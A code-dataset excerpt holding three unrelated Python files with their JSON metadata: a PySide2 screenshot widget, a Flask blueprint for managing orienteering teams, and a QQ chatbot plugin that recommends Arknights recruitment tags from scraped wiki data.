self).__init__(parent)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.palette = QPalette()\n self.desk = QApplication.desktop()\n self.screen = self.desk.screenGeometry()\n self.show_widget = ScreenShotShowWidget(self)\n self.draw_signal.connect(self.show_widget.adjustGeometry)\n self.screenshot()\n\n # 按键监听\n def keyPressEvent(self, evt):\n if evt.key() == Qt.Key_F2:\n self.screenshot()\n if evt.key() == Qt.Key_Escape:\n QApplication.instance().quit()\n\n # 鼠标按下事件\n def mousePressEvent(self, e):\n self.mouse_start_x = e.globalX()\n self.mouse_start_y = e.globalY()\n self.startFlag = True\n self.doingFlag = True\n self.endFlag = False\n # self.show_widget.show()\n\n # 鼠标移动事件\n def mouseMoveEvent(self, event: PySide2.QtGui.QMouseEvent):\n if self.startFlag & self.doingFlag:\n self.show_widget.show()\n self.mouse_current_x = event.globalX()\n self.mouse_current_y = event.globalY()\n pointTopLeft = QPoint(min(self.mouse_start_x, self.mouse_current_x),\n min(self.mouse_start_y, self.mouse_current_y))\n pointBottomRight = QPoint(max(self.mouse_start_x, self.mouse_current_x),\n max(self.mouse_start_y, self.mouse_current_y))\n self.draw_signal.emit(pointTopLeft, pointBottomRight)\n\n # 鼠标松开\n def mouseReleaseEvent(self, e):\n # 如果已经标记了开始\n if self.startFlag:\n # 开始截图标记置否\n self.startFlag = False\n self.doingFlag = False\n self.mouse_end_x = e.globalX()\n self.mouse_end_y = e.globalY()\n\n # 获取当前区域选择像素\n self.endFlag = False\n self.hasResult = True\n # # 识别完成的回调\n # self.setMouseTracking(False)\n # self.hide()\n\n def screenshot(self):\n self.hasResult = False\n # 对鼠标移动事件进行监听\n self.setMouseTracking(True)\n # 标识开始截图\n self.startFlag = True\n self.endFlag = False\n # 休眠0.3秒\n time.sleep(0.3)\n # 调整窗口大小 用于展示当前页面图\n self.setGeometry(0, 0, self.screen.width(), self.screen.height())\n # 截全屏\n self.desktop_pix = QPixmap(QGuiApplication.primaryScreen().grabWindow(0))\n self.blurry_pix = pix_add_blurry(self.desktop_pix, 0.3)\n\n # 设置画笔\n self.palette.setBrush(self.backgroundRole(), QBrush(self.blurry_pix))\n self.setPalette(self.palette)\n # 显示\n self.show()\n\n\nclass ScreenShotShowWidget(QWidget):\n main_widget = None\n\n def __init__(self, main_widget):\n super(ScreenShotShowWidget, self).__init__()\n self.main_widget = main_widget\n self.setUi()\n # 按键监听\n\n def keyPressEvent(self, evt):\n if evt.key() == Qt.Key_F2:\n self.screenshot()\n if evt.key() == Qt.Key_Escape:\n QApplication.instance().quit()\n\n def setUi(self):\n self.setWindowFlags(Qt.WindowStaysOnTopHint | Qt.FramelessWindowHint)\n print(\"hello\")\n\n def paintEvent(self, event: QPaintEvent):\n painter = QPainter(self)\n painter.drawPixmap(self.rect(), self.draw_desktop_pix(self.geometry()))\n self.draw_rect_image(self.geometry())\n\n def mousePressEvent(self, event: QMouseEvent):\n if event.button() == Qt.LeftButton:\n self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()\n self.cursor = QCursor()\n self.cursor.setShape(Qt.SizeAllCursor)\n self.setCursor(self.cursor)\n\n def adjustGeometry(self, leftTop: QPoint, rightBottom: QPoint):\n self.setGeometry(QRect(leftTop, rightBottom))\n\n def mouseMoveEvent(self, event: QMouseEvent):\n self.move(event.globalPos() - self.dragPosition)\n self.update()\n\n def mouseReleaseEvent(self, event: QMouseEvent):\n if event.button() == Qt.LeftButton:\n self.move(event.globalPos() - self.dragPosition)\n self.cursor.setShape(Qt.ArrowCursor)\n self.setCursor(self.cursor)\n\n def draw_desktop_pix(self, rect: QRect):\n return self.main_widget.desktop_pix.copy(rect)\n\n def draw_rect_image(self, rect: QRect):\n paint = QPainter(self)\n paint.setPen(QPen(Qt.red, 3, Qt.SolidLine))\n # 画边框\n paint.drawRect(rect)\n draw_circle(5, rect.top(), rect.left(), QColor(Qt.white), QColor(Qt.red), self)\n draw_circle(5, rect.top(), rect.right(), QColor(Qt.white), QColor(Qt.red), self)\n draw_circle(5, rect.bottom(), rect.left(), QColor(Qt.white), QColor(Qt.red), self)\n draw_circle(5, rect.bottom(), rect.right(), QColor(Qt.white), QColor(Qt.red), self)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n widget = ScreenShotMainWidget()\n widget.show()\n sys.exit(app.exec_())\n","sub_path":"ScreenShotWidget.py","file_name":"ScreenShotWidget.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"295513466","text":"from collections import namedtuple\nfrom datetime import datetime, tzinfo\nfrom flask import Blueprint, render_template, session, redirect\nfrom flask.globals import request\nfrom flask.helpers import url_for\nfrom tupa.modules.services.data import ds\nfrom tupa.modules.helpers.decorators import sallitut_roolit\nfrom tupa.modules.helpers.forms import LisaysForm, MuokkausForm\n\nbp = Blueprint('joukkueet', __name__, url_prefix='/joukkueet')\n\nJoukkue = namedtuple('Joukkue', ['id', 'vanha_sarja', 'sarja', 'kilpailu', 'nimi', 'jasenet'])\n\n@bp.route('/listaa', methods=['GET', 'POST'])\n@sallitut_roolit(['perus', 'admin'])\ndef listaa():\n \"\"\" Reitti, jonka kautta listataan kaikkien kilpailujen tiedot \"\"\"\n\n # apufunktio, jota käytetään hakemaan rastileimausta vastaava koodi\n def koodinhakija(kilpailut):\n \"\"\" Palauttaa funktion, joka hakee kilpailun ja rastin id:n perusteella rastin koodin. \"\"\"\n def _hae_koodi(kilpailu_id, rasti_id) -> str:\n # haetaan rastin tiedot kilpailusta\n rasti = kilpailut[kilpailu_id]['rastit'].get(rasti_id)\n\n return rasti['koodi'] if rasti else \"Tuntematon\"\n return _hae_koodi\n\n kilpailut = _hae_kaikki_tiedot()\n\n # näytetään listaussivu\n return render_template('joukkueet/lista.html',\n kilpailut=kilpailut,\n hae_koodi = koodinhakija(kilpailut))\n\n\n\n@bp.route('/lisaa', methods=['GET', 'POST'])\n@sallitut_roolit(['perus', 'admin'])\ndef lisaa():\n \"\"\" Uuden joukkueen lisäämiseen käytettävä sivu \"\"\"\n\n kayttaja = session.get('kayttaja')\n kilpailut = _hae_kaikki_tiedot()\n\n # jos kilpailuja ei ole, ei uutta joukkuetta voida lisätä\n if len(kilpailut) == 0:\n return redirect(url_for('joukkueet.listaa'))\n\n if request.method == 'GET':\n # täytetään lomakkeen tiedot get pyynnön parametreilla jos ollaan vaihtamassa valittua kilpailua\n form = LisaysForm(request.args)\n else:\n form = LisaysForm()\n\n # lisätään haetut kilpailut vaihtoehdoiksi\n arr_kilpailut = [(id, kilpailu['nimi']) for id, kilpailu in kilpailut.items()]\n form.kilpailu.choices = arr_kilpailut\n\n # valitaan tarvittaessa ensimmäinen kilpailu valmiiksi\n if not form.kilpailu.data:\n form.kilpailu.data = arr_kilpailut[0][0] if len(arr_kilpailut) > 0 else None\n \n # lisätään kilpailuun kuuluvat sarjat vaihtoehdoiksi\n arr_sarjat = [(id, sarja['nimi']) for id, sarja in kilpailut[form.kilpailu.data]['sarjat'].items()]\n form.sarja.choices = arr_sarjat\n\n # valitaan tarvittaessa ensimmäinen kilpailun sarja valmiiksi\n # tämä tehdään vain get-metodille, jotta lomaketta lähetettäessä sarjaa ei talleneta vahingossa\n # väärään sarjaan jos käyttäjä onkin vaihtanut kilpailua ennen lomakkeen lähettämistä\n if request.method == 'GET':\n if not form.sarja.data or form.sarja.data not in kilpailut[form.kilpailu.data]['sarjat'].keys():\n form.sarja.data = arr_sarjat[0][0] if len(arr_sarjat) > 0 else None\n\n\n # tarkistetaan lomake\n if form.validate_on_submit():\n kilpailu_id = int(form.kilpailu.data)\n sarja_id = int(form.sarja.data)\n\n # koostetaan lomakkeen tiedot dictionaryyn\n joukkue_dict = {\n 'nimi': form.nimi.data,\n # poistetaan tyhjät jäsenkentät ja järjestetään jäsenet ennen lisäämistä\n 'jasenet': sorted([_field.data for _field in form.jasenet if _field.data != \"\"]),\n 'leimaukset': {},\n 'lisaaja': kayttaja.get('email')\n }\n\n # lisätään joukkueen tiedot kantaan ja uudelleenohjataan takaisin joukkuelistaukseen\n ds.lisaa_joukkue(joukkue_dict, sarja_id, kilpailu_id)\n return redirect(url_for('joukkueet.listaa'))\n\n # näytetään joukkueen lisäys/muokkauslomake lisäystilassa\n return render_template('joukkueet/form.html',\n form=form,\n mode='lisaa',\n action_url=url_for('joukkueet.lisaa'))\n\n\n\n@bp.route('/muokkaa', methods=['GET', 'POST'])\n@sallitut_roolit(['perus', 'admin'])\ndef muokkaa():\n \"\"\" Valitun joukkueen muokkaukseen käytettävä sivu \"\"\"\n\n kayttaja = session.get('kayttaja')\n valittu_kilpailu = session.get('kilpailu')\n\n # haetaan muokattavan joukkueen tiedot joko pyynnön parametreista tai lomakkeelta\n joukkue_id = request.args.get('id', request.form.get('id', type=int), type=int)\n vanha_sarja_id = request.args.get('sarja', request.form.get('vanha_sarja', type=int), type=int)\n kilpailu_id = request.args.get('kilpailu', request.form.get('kilpailu', type=int), type=int)\n\n joukkue = ds.hae_joukkue(joukkue_id, vanha_sarja_id, kilpailu_id)\n kilpailu = ds.hae_kilpailu(kilpailu_id)\n\n # varmistetaan että tietoja vastaava joukkue ja kilpailu löytyvät tietokannasta\n if not (joukkue and kilpailu):\n return render_template('error.html', message=\"Virheellinen tunniste\")\n\n # varmistetaan että käyttäjällä on oikeus muokata joukkuetta\n if (kayttaja['email'] != joukkue['lisaaja'] and\n not ('admin' in kayttaja['roolit'] and kilpailu_id == int(valittu_kilpailu))):\n return redirect(url_for('joukkueet.listaa'))\n\n # luodaan lomake täytettynä valitun joukkueen tiedoilla\n joukkue_obj = Joukkue(joukkue_id, vanha_sarja_id, vanha_sarja_id, kilpailu_id, joukkue['nimi'], joukkue['jasenet'])\n form = MuokkausForm(obj=joukkue_obj)\n \n # haetaan kilpailun sarjat\n arr_sarjat = [(sarja.key.id, sarja['nimi']) for sarja in ds.hae_sarjat(kilpailu_id)]\n form.sarja.choices = arr_sarjat\n\n # valitaan ensimmäinen sarja jos mitään ei ole vielä valittuna\n if not form.sarja.data:\n form.sarja.data = arr_sarjat[0][0] if len(arr_sarjat) > 0 else None\n\n # tarkistetaan lomake\n if form.validate_on_submit():\n\n # jos joukkue on valittu poistettavaksi, \n if form.poista.data:\n ds.poista_joukkue(joukkue_id, vanha_sarja_id, kilpailu_id)\n return redirect(url_for('joukkueet.listaa'))\n\n # koostetaan lomakkeen tiedot dictionaryyn\n joukkue_dict = {\n 'nimi': form.nimi.data,\n # poistetaan tyhjät jäsenkentät ja järjestetään jäsenten tiedot\n 'jasenet': sorted([_field.data for _field in form.jasenet if _field.data != \"\"])\n }\n\n # päivitetään joukkueen tiedot kantaan ja uudelleenohjataan takaisin joukkuelistaukseen\n sarja_id = form.sarja.data\n if vanha_sarja_id == sarja_id:\n # jos sarja ei ole vaihtunut, tehdään päivitys suoraan\n ds.paivita_joukkue(joukkue_dict, joukkue_id, vanha_sarja_id, kilpailu_id)\n else:\n # jos sarja on vaihdettu, pitää joukkueen avain luoda uusiksi, joka tehdään poistamalla joukkue ja lisäämällä uusi\n # nyt joukkueen id vaihtuu, joka voi rikkoa toiminallisuutta jos esim. leimauksen avaimessa on joukkueen id...\n # nykyisellä toteutustavalla tällä ei kuitenkaan ole merkitystä\n ds.poista_joukkue(joukkue_id, vanha_sarja_id, kilpailu_id)\n joukkue_dict['lisaaja'] = joukkue['lisaaja']\n joukkue_dict['leimaukset'] = joukkue['leimaukset']\n ds.lisaa_joukkue(joukkue_dict, sarja_id, kilpailu_id)\n \n return redirect(url_for('joukkueet.listaa'))\n\n # näytetään joukkueen muokkaussivu\n # (samaa pohjaa käytetään monessa yhteydessä, sivun sisältö määritetään roolin ja moodin perusteella)\n return render_template('joukkueet/form.html',\n form=form,\n mode='muokkaa',\n action_url=url_for('joukkueet.muokkaa'))\n\n\n######### APUFUNKTIOT ############\n\ndef _hae_kaikki_tiedot() -> dict:\n # haetaan datastoresta kaikki entityt\n kilpailut = ds.hae_kilpailut()\n sarjat = ds.hae_sarjat()\n rastit = ds.hae_rastit()\n joukkueet = ds.hae_joukkueet()\n\n kayttaja = session.get('kayttaja')\n valittu_kilpailu = session.get('kilpailu')\n\n # lisätään kilpailut hakemistoon, jossa tiedot palautetaan\n dict_kilpailut = {kilpailu.id:{key:kilpailu[key] for key in kilpailu.keys()} for kilpailu in kilpailut}\n\n # iteroidaan kilpailut läpi ja lisätään niihin kuuluvat sarjat, rastit ja joukkueet alihakemistoina\n # ratkaisu ei ole järin tehokas, mutta aivan riittävä tälle datan määrälle ja mukavan suoraviivainen\n for kilpailu_id, kilpailu in dict_kilpailut.items():\n kilpailu['sarjat'] = {sarja.id:{key:sarja[key] for key in sarja.keys()} for sarja in sarjat if sarja.key.parent.id == kilpailu_id}\n kilpailu['rastit'] = {rasti.id:{key:rasti[key] for key in rasti.keys()} for rasti in rastit if rasti.key.parent.id == kilpailu_id}\n\n # tallennetaan valitun kilpailun rastien tietoihin lupa muokata, jos ollaan admin-tilassa\n for rasti in kilpailu['rastit'].values():\n rasti['saa_muokata'] = ('admin' in kayttaja['roolit'] and kilpailu_id == valittu_kilpailu)\n\n for sarja_id, sarja in kilpailu['sarjat'].items():\n # lisätään joukkueet sarjakohtaisesti\n sarja['joukkueet'] = {joukkue.id:{key:joukkue[key] for key in joukkue.keys()} for joukkue in joukkueet if joukkue.key.parent.id == sarja_id}\n for joukkue in sarja['joukkueet'].values():\n\n # tallennetaan joukkueiden tietoihin lupa muokata, jos ollaan oikean kilpailun admin-tilassa tai joukkueen lisääjä\n joukkue['saa_muokata'] = ('admin' in kayttaja['roolit'] and kilpailu_id == valittu_kilpailu\n or joukkue['lisaaja'] == kayttaja['email'])\n \n # muunnetaan helpompaa käsittelyä varten leimausten id kokonaisluvuksi ja aikaleima merkkijonoksi\n leimaukset = {int(key): value.strftime(\"%Y-%m-%d %H:%M:%S\") for key, value in sorted(joukkue['leimaukset'].items(), key=lambda item: item[1])}\n joukkue['leimaukset'] = leimaukset\n \n return dict_kilpailut","sub_path":"vt4/tupa/modules/blueprints/joukkueet.py","file_name":"joukkueet.py","file_ext":"py","file_size_in_byte":10089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"653324476","text":"from nonebot import on_command, CommandSession\r\nfrom nonebot import on_natural_language, NLPSession, IntentCommand\r\nimport requests\r\nfrom html import unescape\r\nfrom lxml import html\r\nimport os, sys\r\n\r\no_path = os.getcwd()\r\no_path=o_path+\"/akaisora/plugins/\"\r\nsys.path.append(o_path)\r\n\r\nfrom ocr_tool import Ocr_tool\r\n\r\npath_prefix=\"./akaisora/plugins/\"\r\n# path_prefix=\"\"\r\n\r\n# some comments below is from the demo code of nonebot\r\n\r\n# on_command 装饰器将函数声明为一个命令处理器\r\n# 这里 weather 为命令的名字,同时允许使用别名「天气」「天气预报」「查天气」\r\n@on_command('tagrc', aliases=(), only_to_me=False)\r\nasync def tagrc(session: CommandSession):\r\n # 从会话状态(session.state)中获取城市名称(city),如果当前不存在,则询问用户\r\n # tags = session.get('tags', prompt='输入tag列表,空格隔开')\r\n tags=session.state['tags'] if 'tags' in session.state else None\r\n images=session.state['images'] if 'images' in session.state else None\r\n if not tags and not images:return\r\n # 获取城市的天气预报\r\n tagrc_report = await get_recomm_tags(tags=tags,images=images)\r\n if tagrc_report is None: return \r\n # 向用户发送天气预报\r\n await session.send(tagrc_report)\r\n \r\n@on_command('hello', aliases=(), only_to_me=True)\r\nasync def hello(session: CommandSession):\r\n\r\n info_msg=\"\"\"明日方舟 公开招募助手机器人\r\n用法:\r\n1.输入词条列表,空格隔开\r\n 如: 近卫 男\r\n2.发送招募词条截图\r\n \r\n3.tell 干员名称\r\n 如: tell 艾雅法拉\r\nGithub链接: https://github.com/Akaisorani/QQ-bot-Arknights-Helper\"\"\"\r\n\r\n await session.send(info_msg)\r\n \r\n@on_command('update_data', aliases=(), only_to_me=True)\r\nasync def update_data(session: CommandSession):\r\n\r\n tags_recom.char_data.fetch_data()\r\n tags_recom.char_data.extract_all_char(text_file=path_prefix+\"chardata.html\")\r\n \r\n \r\n info_msg=\"update done\"\r\n\r\n await session.send(info_msg)\r\n \r\n@on_command('tell', aliases=(), only_to_me=False)\r\nasync def tell(session: CommandSession):\r\n name=session.state['name'] if 'name' in session.state else None\r\n if not name :return\r\n # 获取城市的天气预报\r\n tell_report = await get_peo_info(name=name)\r\n if tell_report is None: return \r\n # 向用户发送天气预报\r\n await session.send(tell_report)\r\n\r\n# weather.args_parser 装饰器将函数声明为 weather 命令的参数解析器\r\n# 命令解析器用于将用户输入的参数解析成命令真正需要的数据\r\n@tagrc.args_parser\r\nasync def _(session: CommandSession):\r\n # 去掉消息首尾的空白符\r\n stripped_arg = session.current_arg_text.strip()\r\n images_arg=session.current_arg_images\r\n \r\n print(\"stripped_arg\", stripped_arg)\r\n print(\"images_arg\", images_arg)\r\n if session.is_first_run:\r\n # 该命令第一次运行(第一次进入命令会话)\r\n if stripped_arg:\r\n # 第一次运行参数不为空,意味着用户直接将城市名跟在命令名后面,作为参数传入\r\n # 例如用户可能发送了:天气 南京\r\n session.state['tags'] = stripped_arg\r\n elif images_arg:\r\n session.state['images'] = images_arg\r\n return\r\n\r\n # if not stripped_arg:\r\n # # 用户没有发送有效的城市名称(而是发送了空白字符),则提示重新输入\r\n # # 这里 session.pause() 将会发送消息并暂停当前会话(该行后面的代码不会被运行)\r\n # session.pause('输入错误,请重新输入')\r\n\r\n # 如果当前正在向用户询问更多信息(例如本例中的要查询的城市),且用户输入有效,则放入会话状态\r\n # session.state[session.current_key] = stripped_arg\r\n\r\n# on_natural_language 装饰器将函数声明为一个自然语言处理器\r\n# keywords 表示需要响应的关键词,类型为任意可迭代对象,元素类型为 str\r\n# 如果不传入 keywords,则响应所有没有被当作命令处理的消息\r\n@on_natural_language(only_to_me=False, keywords=None)\r\nasync def _(session: NLPSession):\r\n\r\n # stripped_msg = session.msg_text.strip()\r\n msg=session.msg\r\n\r\n # 返回意图命令,前两个参数必填,分别表示置信度和意图命令名\r\n return IntentCommand(90.0, 'tagrc', current_arg=msg or '')\r\n \r\n@tell.args_parser\r\nasync def _(session: CommandSession):\r\n # 去掉消息首尾的空白符\r\n stripped_arg = session.current_arg_text.strip()\r\n \r\n print(\"tell stripped_arg\", stripped_arg)\r\n if session.is_first_run:\r\n # 该命令第一次运行(第一次进入命令会话)\r\n if stripped_arg:\r\n # 第一次运行参数不为空,意味着用户直接将城市名跟在命令名后面,作为参数传入\r\n # 例如用户可能发送了:天气 南京\r\n session.state['name'] = stripped_arg\r\n return\r\n\r\n\r\nasync def get_recomm_tags(tags: str, images: list) -> str:\r\n # 这里简单返回一个字符串\r\n # 实际应用中,这里应该调用返回真实数据的天气 API,并拼接成天气预报内容\r\n tags_list=tags.split() if tags else []\r\n report=tags_recom.recom(tags_list, images)\r\n \r\n return report\r\n \r\nasync def get_peo_info(name: str) -> str:\r\n # 这里简单返回一个字符串\r\n # 实际应用中,这里应该调用返回真实数据的天气 API,并拼接成天气预报内容\r\n report=tags_recom.char_data.get_peo_info(name)\r\n \r\n return report\r\n\r\n\r\nclass Character(object):\r\n def __init__(self):\r\n self.char_data=dict()\r\n self.head_data=[]\r\n self.head_key_map={\r\n \"职业\":\"job\",\r\n \"星级\":\"rank\",\r\n \"性别\":\"sex\",\r\n \"阵营\":\"affiliation\",\r\n \"标签\":\"tags\",\r\n \"获取途径\":\"obtain_method\"\r\n }\r\n \r\n def extract_all_char(self, text_string=None, text_file=None, head_file=None):\r\n if text_file is None:text_file=path_prefix+\"chardata.html\" \r\n if head_file is None:head_file=path_prefix+\"data_head.html\" \r\n if not os.path.exists(text_file) or not os.path.exists(head_file):\r\n self.fetch_data()\r\n if text_string is None:\r\n with open(text_file,encoding='UTF-8') as fp:\r\n text_string=fp.read()\r\n with open(head_file,encoding='UTF-8') as fp:\r\n head_string=fp.read()\r\n self.head_data=head_string.split(',')\r\n\r\n tree=html.fromstring(text_string)\r\n char_res_lis=tree.xpath(\"//tr\")\r\n \r\n self.char_data=dict()\r\n for char_tr in char_res_lis:\r\n name=char_tr.xpath(\"./td[2]/a[1]/text()\")[0]\r\n self.char_data[name]=dict()\r\n self.char_data[name][\"job\"]=char_tr.xpath(\"./@data-param1\")[0]\r\n self.char_data[name][\"rank\"]=char_tr.xpath(\"./@data-param2\")[0].split(\",\")[0]\r\n self.char_data[name][\"sex\"]=char_tr.xpath(\"./@data-param3\")[0]\r\n self.char_data[name][\"affiliation\"]=char_tr.xpath(\"./@data-param4\")[0]\r\n tag_string=char_tr.xpath(\"./@data-param5\")[0]+\", \" \\\r\n +self.char_data[name][\"sex\"]+\", \" \\\r\n +self.char_data[name][\"job\"]+\", \" \\\r\n +(\"资深干员\" if self.char_data[name][\"rank\"]==\"5\" else \"\")+\", \" \\\r\n +(\"高级资深干员\" if self.char_data[name][\"rank\"]==\"6\" else \"\")+\", \"\r\n taglist=[x.strip() for x in tag_string.split(\",\")]\r\n taglist=[x for x in taglist if x!=\"\"]\r\n self.char_data[name][\"tags\"]=taglist\r\n self.char_data[name][\"obtain_method\"]=list(map(lambda x: x.strip(), char_tr.xpath(\"./@data-param6\")[0].split(\",\")))\r\n \r\n #deal head and data\r\n td_lis=char_tr.xpath(\".//td\")\r\n text_lis=[\"\".join([xx.strip() for xx in x.xpath(\".//text()\")]) for x in td_lis]\r\n all_lis=[x.strip() for x in text_lis]\r\n self.char_data[name][\"all\"]=all_lis\r\n \r\n def filter(self, tags):\r\n tags=tags[:]\r\n ranks=self.gen_ranks(tags)\r\n for name, dic in self.char_data.items():\r\n if set(tags).issubset(set(dic[\"tags\"])) and \"公开招募\" in dic[\"obtain_method\"] and dic[\"rank\"] in ranks:\r\n yield name\r\n \r\n def gen_ranks(self, tags):\r\n ranks=[\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]\r\n for i in range(1,7):\r\n if \">={0}\".format(i) in tags:\r\n ranks=[x for x in ranks if x>=str(i)]\r\n tags.remove(\">={0}\".format(i))\r\n if \"<={0}\".format(i) in tags:\r\n ranks=[x for x in ranks if x<=str(i)]\r\n tags.remove(\"<={0}\".format(i))\r\n if \"高级资深干员\" not in tags:\r\n ranks.remove(\"6\")\r\n if \"资深干员\" in tags:\r\n ranks=[\"5\"]\r\n if \"高级资深干员\" in tags:\r\n ranks=[\"6\"]\r\n return ranks\r\n \r\n def get_peo_info(self, name=None):\r\n if not name or name not in self.char_data:\r\n return None\r\n res=[]\r\n for tp, cont in zip(self.head_data,self.char_data[name]['all']):\r\n if tp:\r\n if tp==\"干员代号\":tp=\"��名\"\r\n res.append(\"{0}: {1}\".format(tp,cont))\r\n return \"\\n\".join(res)\r\n \r\n def fetch_data(self):\r\n r=requests.get(\"http://wiki.joyme.com/arknights/干员数据表\")\r\n tree=html.fromstring(r.text)\r\n \r\n # people data\r\n people_list=tree.xpath(\"//tr[@data-param1]\")\r\n res=\"\".join([unescape(html.tostring(peo).decode('utf-8')) for peo in people_list])\r\n \r\n with open(path_prefix+\"chardata.html\",\"w\",encoding='utf-8') as fp:\r\n fp.write(res)\r\n \r\n # table head data\r\n tb_head=tree.xpath(\"//table[@id='CardSelectTr']//th/text()\")\r\n tb_head=[x.strip() for x in tb_head]\r\n with open(path_prefix+\"data_head.html\",\"w\",encoding='utf-8') as fp:\r\n fp.write(\",\".join(tb_head))\r\n \r\nclass Tags_recom(object):\r\n def __init__(self):\r\n self.char_data=Character()\r\n self.char_data.extract_all_char(text_file=path_prefix+\"chardata.html\")\r\n self.all_tags={\r\n '狙击', '术师', '特种', '重装', '辅助', '先锋', '医疗', '近卫',\r\n '减速', '输出', '生存', '群攻', '爆发', '召唤', '快速复活','费用回复',\r\n '新手', '治疗', '防护', '位移', '削弱', '控场', '支援',\r\n '近战位', '远程位',\r\n '近战', '远程',\r\n '资深干员','高级资深干员', \r\n '女', '男',\r\n '女性', '男性',\r\n '狙击干员', '术师干员', '特种干员', '重装干员', '辅助干员', '先锋干员', '医疗干员', '近卫干员',\r\n '女性干员', '男性干员'\r\n } \r\n \r\n self.ocr_tool=Ocr_tool()\r\n \r\n def recom_tags(self, tags):\r\n tags=self.strip_tags(tags)\r\n \r\n itertag=self.iter_all_combine(tags)\r\n if itertag is None:return []\r\n cob_lis=list(itertag)\r\n cob_lis.remove([])\r\n cob_lis=[(tags_lis, list(self.char_data.filter(tags_lis))) for tags_lis in cob_lis]\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n \r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x)\r\n \r\n # remove same result\r\n for i in range(0,len(cob_lis)):\r\n for j in range(0,len(cob_lis)):\r\n if i==j:continue\r\n if set(cob_lis[i][1])==set(cob_lis[j][1]):\r\n if set(cob_lis[i][0]).issubset(set(cob_lis[j][0])):\r\n cob_lis[i]=(cob_lis[i][0],[])\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x)\r\n \r\n # special remove\r\n for i in range(len(cob_lis)):\r\n if self.is_special_rm(cob_lis[i]):\r\n cob_lis[i]=(cob_lis[i][0],[])\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x) \r\n \r\n # sort\r\n cob_lis.sort(key=self.avg_rank, reverse=True)\r\n for tags_lis, lis in cob_lis:\r\n lis.sort(key=lambda x:self.char_data.char_data[x][\"rank\"], reverse=True)\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x)\r\n \r\n # for x in cob_lis:\r\n # print(self.avg_rank(x))\r\n \r\n # # build reverse index\r\n # char_dic=dict()\r\n # for i in range(len(cob_lis)):\r\n # for name in cob_lis[i][1]:\r\n # if name not in char_dic:\r\n # char_dic[name]=[i]\r\n # else:\r\n # char_dic[name].append(i)\r\n # # print(\"\")\r\n # # print(char_dic)\r\n \r\n # # remove duplicate\r\n # min_size_id=dict()\r\n # for name, lis in char_dic.items():\r\n # if len(lis)>1:\r\n # min_size_id[name]=lis[0]\r\n # for id in lis:\r\n # if len(cob_lis[id][1])1: \r\n # for id in lis:\r\n # if id!=min_size_id[name]:\r\n # cob_lis[id][1].remove(name)\r\n # cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n # # print(\"\")\r\n # # for x in cob_lis:\r\n # # print(x)\r\n \r\n #merge less rank 3\r\n for tags_lis, lis in cob_lis:\r\n cnt=0\r\n sp_lis=[]\r\n while len(lis)>0 and self.char_data.char_data[lis[-1]][\"rank\"]<=\"3\":\r\n res=lis.pop()\r\n if res==\"Castle-3\":\r\n sp_lis.append(res)\r\n else:\r\n cnt+=1\r\n \r\n if len(sp_lis)>0:\r\n lis.extend(sp_lis)\r\n if cnt>0 and len(lis)>0:\r\n lis.append(\"...{0}\".format(cnt))\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n \r\n return cob_lis\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x) \r\n \r\n \r\n \r\n def is_special_rm(self, cob_i):\r\n if set(cob_i[0])==set([\"女\"]):\r\n return True\r\n # if set(cob_i[0])==set([\"男\"]):\r\n # return True\r\n return False\r\n \r\n def avg_rank(self, cob_i):\r\n rank_map={1:0.5, 2:1, 3:3, 4:2, 5:0.5, 6:3}\r\n rank_list=list(map(lambda x:int(self.char_data.char_data[x][\"rank\"]),cob_i[1]))\r\n sum_score=0\r\n sum_cnt=0\r\n for i in range(1,7):\r\n sum_score+=rank_list.count(i)*rank_map[i]*i\r\n sum_cnt+=rank_list.count(i)*rank_map[i]\r\n if sum_cnt==0:return 0\r\n else: return sum_score/sum_cnt\r\n \r\n def strip_tags(self, tags):\r\n restags=[]\r\n for tag in tags:\r\n if tag==\"高级资深干员\" or tag==\"资深干员\":\r\n restags.append(tag)\r\n elif tag==\"近战\" or tag==\"远程\":\r\n restags.append(tag+\"位\")\r\n elif tag==\"男性\" or tag==\"女性\":\r\n tag=tag.replace(\"性\",\"\")\r\n restags.append(tag) \r\n elif \"性干员\" in tag:\r\n tag=tag.replace(\"性干员\",\"\")\r\n restags.append(tag)\r\n elif \"干员\" in tag:\r\n tag=tag.replace(\"干员\",\"\")\r\n restags.append(tag)\r\n else:\r\n restags.append(tag)\r\n return restags\r\n \r\n def iter_all_combine(self, tags):\r\n if len(tags)==0:\r\n yield []\r\n return\r\n tag=tags[0]\r\n new_tags=tags[:]\r\n new_tags.remove(tag)\r\n for x in self.iter_all_combine(new_tags):\r\n yield [tag]+x\r\n for x in self.iter_all_combine(new_tags):\r\n yield x\r\n \r\n def check_legal_tags(self, tags):\r\n if not tags: return False\r\n for tag in tags:\r\n if tag not in self.all_tags:\r\n return False\r\n return True\r\n \r\n def recom(self, tags=None, images=None):\r\n if not tags:\r\n if images:\r\n tags=self.get_tags_from_image(images)\r\n if not tags: return None\r\n else:\r\n return None\r\n \r\n if not self.check_legal_tags(tags):\r\n return None\r\n cob_lis=self.recom_tags(tags)\r\n if not cob_lis:\r\n return \"没有或者太多\"\r\n line_lis=[]\r\n for tags_lis, lis in cob_lis:\r\n new_lis=[]\r\n for x in lis:\r\n if x in self.char_data.char_data:\r\n new_lis.append(x+\"★\"+self.char_data.char_data[x][\"rank\"])\r\n else:\r\n new_lis.append(\"★1~3\"+x)\r\n lef='【'+'+'.join(tags_lis)+\"】:\\n\"\r\n rig=', '.join(new_lis)\r\n line_lis.append(lef+rig)\r\n res=\"\\n\\n\".join(line_lis)\r\n return res\r\n \r\n def get_tags_from_image(self, images):\r\n tags=self.ocr_tool.get_tags_from_url(images[0])\r\n return tags\r\n \r\n 